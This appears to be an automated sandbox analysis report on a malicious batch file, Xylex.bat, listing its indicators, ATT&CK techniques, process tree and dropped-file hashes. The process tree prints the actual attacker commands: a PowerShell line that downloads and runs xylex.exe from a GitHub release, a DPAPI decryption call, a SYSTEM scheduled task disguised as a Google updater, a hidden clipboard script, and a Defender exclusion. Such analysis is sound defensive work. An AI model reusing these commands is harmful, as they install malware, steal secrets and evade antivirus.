bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f

Analysis

max time kernel
10s
max time network
9s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
03-06-2024 04:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Executor/Xylex.bat
Size

255B
MD5

aa385e3b4104f4529680f554cdc39b40
SHA1

00ab4c02495c60b0fce2ec3e6967b864e1156cae
SHA256

e0cf8ed28a7efbcb910b6e7d78641179e39a81fae787308eb6112745e59f1076
SHA512

ad06ece28950fa050775f899d0574c44ccf86912f465bd5e7c041b972173ef16a34a6857be8dfb1bd13163099d710b9fcf3c09a110f406e3a8608e71df16c66e

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	5044	powershell.exe
4	5044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1140	powershell.exe
4008	powershell.exe
988	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation	xylex.exe

Executes dropped EXE 1 IoCs

pid	Process
1400	xylex.exe

Loads dropped DLL 1 IoCs

pid	Process
1400	xylex.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

pid	Process
208	cmd.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4132	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
4692	tasklist.exe
696	tasklist.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
988	powershell.exe
988	powershell.exe
988	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	4692	tasklist.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 824 wrote to memory of 5044	824	cmd.exe	74
PID 824 wrote to memory of 5044	824	cmd.exe	74
PID 5044 wrote to memory of 1400	5044	powershell.exe	75
PID 5044 wrote to memory of 1400	5044	powershell.exe	75
PID 1400 wrote to memory of 2736	1400	xylex.exe	78
PID 1400 wrote to memory of 2736	1400	xylex.exe	78
PID 2736 wrote to memory of 4156	2736	cmd.exe	79
PID 2736 wrote to memory of 4156	2736	cmd.exe	79
PID 2736 wrote to memory of 988	2736	cmd.exe	80
PID 2736 wrote to memory of 988	2736	cmd.exe	80
PID 988 wrote to memory of 4212	988	powershell.exe	81
PID 988 wrote to memory of 4212	988	powershell.exe	81
PID 4212 wrote to memory of 3860	4212	csc.exe	82
PID 4212 wrote to memory of 3860	4212	csc.exe	82
PID 1400 wrote to memory of 4316	1400	xylex.exe	83
PID 1400 wrote to memory of 4316	1400	xylex.exe	83
PID 1400 wrote to memory of 8	1400	xylex.exe	84
PID 1400 wrote to memory of 8	1400	xylex.exe	84
PID 8 wrote to memory of 4692	8	cmd.exe	85
PID 8 wrote to memory of 4692	8	cmd.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
    "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        5⤵
        
        PID:4156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noprofile -
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:988
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o2isfcc5\o2isfcc5.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4212
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C13.tmp" "c:\Users\Admin\AppData\Local\Temp\o2isfcc5\CSCD286AEDC2A7B40468BC5BCF3D1E6AE61.TMP"
        7⤵
        
        PID:3860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:4316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:8
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:1360
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,87,212,196,210,124,230,59,67,161,164,74,188,173,47,152,49,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,144,174,75,151,108,166,153,222,237,136,28,87,26,24,82,182,202,107,187,144,164,220,51,246,242,25,119,9,158,46,152,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,176,48,48,10,29,108,244,168,17,173,244,197,21,33,68,36,65,27,172,90,66,1,7,0,101,23,28,241,151,75,50,82,48,0,0,0,214,89,73,239,166,62,101,217,82,172,121,245,141,59,225,236,8,184,155,69,178,175,226,188,29,222,188,22,5,232,234,251,132,97,77,145,69,158,199,224,125,249,24,219,101,156,14,212,64,0,0,0,52,84,202,201,230,21,226,20,45,91,90,45,205,168,20,127,116,11,66,185,143,23,144,32,219,138,94,234,96,214,154,75,20,214,187,201,45,199,214,65,249,116,69,34,116,167,116,77,113,114,200,120,42,103,245,228,226,43,177,204,28,237,76,122), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,87,212,196,210,124,230,59,67,161,164,74,188,173,47,152,49,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,144,174,75,151,108,166,153,222,237,136,28,87,26,24,82,182,202,107,187,144,164,220,51,246,242,25,119,9,158,46,152,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,176,48,48,10,29,108,244,168,17,173,244,197,21,33,68,36,65,27,172,90,66,1,7,0,101,23,28,241,151,75,50,82,48,0,0,0,214,89,73,239,166,62,101,217,82,172,121,245,141,59,225,236,8,184,155,69,178,175,226,188,29,222,188,22,5,232,234,251,132,97,77,145,69,158,199,224,125,249,24,219,101,156,14,212,64,0,0,0,52,84,202,201,230,21,226,20,45,91,90,45,205,168,20,127,116,11,66,185,143,23,144,32,219,138,94,234,96,214,154,75,20,214,187,201,45,199,214,65,249,116,69,34,116,167,116,77,113,114,200,120,42,103,245,228,226,43,177,204,28,237,76,122), $null, 'CurrentUser')
        5⤵
        
        PID:216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1280
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
      4⤵
      PID:3256
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
        5⤵
        
        PID:5064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      4⤵
      PID:312
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
        5⤵
        Creates scheduled task(s)
        
        PID:4132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
      4⤵
      PID:4136
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1140
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvtbi2uv\qvtbi2uv.cmdline"
        6⤵
        
        PID:3896
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9069.tmp" "c:\Users\Admin\AppData\Local\Temp\qvtbi2uv\CSCC60CE64D16E94C7F8AFF3F60966D8CC4.TMP"
        7⤵
        
        PID:948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:4180
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:4176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
      4⤵
      PID:2384
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
        5⤵
        
        PID:4720
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
        6⤵
        
        PID:3312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5116
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:4052
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:3544
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:3504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:4480
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:3816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
      4⤵
      PID:3388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell wininit.exe
        5⤵
        
        PID:2544
      - C:\Windows\system32\wininit.exe
        
        "C:\Windows\system32\wininit.exe"
        6⤵
        
        PID:3464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
05ec53e2d2d9867bc93e34e694faec45

SHA1
221d09c47199869538f2b541afa736c03c8d9579

SHA256
ec3ea75321fd8f902276f09b944f01186137b1df0032cd0b19f1cb4772f3c55f

SHA512
a31b105c05b4414c299cfd937757514e293da2772b905a185da21817edf29e6e22c25ad196976a774ba8352550f8d4c1735dbf9a10074e384abfb912e54aa011

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73e36033d0dfdbd318b352d8a1dd471a

SHA1
3bdd05d8c3b2bc57029209a16cbaa809d6865345

SHA256
df36467ed1ca2324fb5c8832116d2db151544a9d05fd7113ad69b00aec9f4903

SHA512
e9648ea7b7565cc37f19f4374c6e19439672d5e1625b979d63ba59c3b0b4c4021f32c46b929dbea7fe9c74774768546c949f02e803a744e070fa99b5c15d5e42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2445cef3cb61cf7b65bb9d3c558c62a6

SHA1
ad1d8dd399ebd91415706de218cf2c582bafa140

SHA256
bc5b7a5b0dc29d4969f38ceedd5cfe50f6b10e2a98304d8fe68aeda980af91b3

SHA512
dca0738133a64e1ef4ec97b061dd56c39dbf376cbc82c42064dde6c8e91ba00638ef7e17f15ed87a6cc9c040d70973a0a15197a74f8e0e6a29a13bc5964da6a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

Filesize
37.6MB

MD5
8eacf3f9be7e3735352c4020fc4e05e9

SHA1
0bb6c048d9e683e152de21f7d368a4c151095504

SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e

SHA512
2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8C13.tmp

Filesize
1KB

MD5
046aef996efa84d4d7fab3a578aba056

SHA1
e01211a081358da4fccf75471b18cc887b260094

SHA256
2f91f7657b78e7921add0c370a47fb503677b30c2b409a2dce0b4a94ef55d604

SHA512
f6abf620959663a2df889410735d94d34e54d53e199de224727fc0cae11216bbbd05fe911edc350cfeecba49c56daca73cb73528bfdb62bc3cd350889c78e377

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9069.tmp

Filesize
1KB

MD5
14944128273d6c7f94c68b092600130f

SHA1
7b85ab31e62261c28ba34b3b55c0c73bc2584861

SHA256
8db0d9814f26625ecdcbf21ec3aab1594b34cee08735b5408e03c0fec504fc06

SHA512
696f0a22c68915c4c73ee48da583221cf784e2af21f01c4f238aca37b2e669afe707ac8534914afaf7780b1772ecd9b5fe302d4d894991c37441eec1c30031d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ydk4e2fw.ixs.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\o2isfcc5\o2isfcc5.dll

Filesize
3KB

MD5
c9dd82bd0c15883cf8ebd6d19b86b6ff

SHA1
8b678109d51cb6e89bf1e998a45ba5301197bddf

SHA256
96b42068d531e92820f0e3ccd8eb69f4bdf87034a8e658eb67dfecbd44e809b3

SHA512
3d3f09c0eb776e2e78e3e9c31aa3c27591b3b8b857373b9781ebd8353df74a4a61b3f728d32a364a1f839bd766d875ccabca0b339393fb7d589e07c87495637d

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\qvtbi2uv\qvtbi2uv.dll

Filesize
3KB

MD5
5a22ef1153d06019fd35d98632991560

SHA1
e7fbaa300a701adde43185930c2c1dddef597c33

SHA256
100cec8b50d6207ba5ad93ab93d3063cc2c82551374c49a70b37a88e2c364b9e

SHA512
28137d38b9a418c61446d7ebd73d68fe7b2f93c556e00e0fa81cbe5215f5b420a242c78d4c9ba370df2cf9a3c7679e016eb6e7f568ac8f0062582a3b0a54ba9a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o2isfcc5\CSCD286AEDC2A7B40468BC5BCF3D1E6AE61.TMP

Filesize
652B

MD5
23f17399106ce81b5bcd92f716f5e19a

SHA1
47df52b60a83da017f02d77ad4accb9613709679

SHA256
e32c177f88ba00bdb0180dc2362dac97fa26f860e54632ce6e0c77b58ce711c0

SHA512
2380bafe3ca4ab3da66e86711735c5b61a537464e2103acb573cf096ab4d8335a08e08c5e3ec999dd428c9b4da7902e971db873408160acb171d2642337f30fd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o2isfcc5\o2isfcc5.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o2isfcc5\o2isfcc5.cmdline

Filesize
369B

MD5
d4458776b5c226bfbe35735925d86ec1

SHA1
3b65795db6f3ce150520e4f82cc5e65b4d8aa247

SHA256
775deb699a8cc7bdbaee06d52914308ca5b46599b8fc95e86571c76ec8a514c6

SHA512
6ef0fe15d2fabd39a89142723477f9d6efa3e4ceee9c55f78d8f70101ba4b79f1ac291828849fa7412d36f63fdc94944e105041817d4bf22477183fdb47f41ac

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvtbi2uv\CSCC60CE64D16E94C7F8AFF3F60966D8CC4.TMP

Filesize
652B

MD5
c3994cee91ad66fede86e8aab864e069

SHA1
bdd14025f9edebd3a10ad80d4b84caf27fe2e384

SHA256
40e30a6ce3cca20436a0e4c27d9735646672135e9941564eeb58d7be40dd80c9

SHA512
27fb05331ff5b171dc72020c4ba6af14a6095d2c774133b1fd024bac262d1cb55a554bd7683caf189be0c2e1cd93c08e034a570773d6b094ee554324e88a3385

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvtbi2uv\qvtbi2uv.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvtbi2uv\qvtbi2uv.cmdline

Filesize
369B

MD5
9eb2e30c791980c9397a92b3e85600bf

SHA1
41bda02b38980a3a1343799d92fc2aaeec490f02

SHA256
1572720574176cdad9615110d417a1071536283891509a3b7012552746ec8fd9

SHA512
6908855907569806be8fdd991eba4fe7ee93b376b630acfd7535a052d001dee100b22ecb17c2fd63e4b5e7da1372e85546d987427465f8374d87a1f8c1327083

Download Submit
memory/216-295-0x00000279386B0000-0x0000027938700000-memory.dmp

Filesize
320KB

Download
memory/988-235-0x000001DB5AB20000-0x000001DB5AB28000-memory.dmp

Filesize
32KB

Download
memory/988-155-0x000001DB5AEB0000-0x000001DB5AEEC000-memory.dmp

Filesize
240KB

Download
memory/1140-373-0x000001FA6EB50000-0x000001FA6EB58000-memory.dmp

Filesize
32KB

Download
memory/5044-9-0x0000026D51D80000-0x0000026D51DF6000-memory.dmp

Filesize
472KB

Download
memory/5044-7-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp

Filesize
9.9MB

Download
memory/5044-5-0x0000026D51BD0000-0x0000026D51BF2000-memory.dmp

Filesize
136KB

Download
memory/5044-10-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp

Filesize
9.9MB

Download
memory/5044-50-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp

Filesize
9.9MB

Download
memory/5044-26-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp

Filesize
9.9MB

Download
memory/5044-3-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp

Filesize
4KB

Download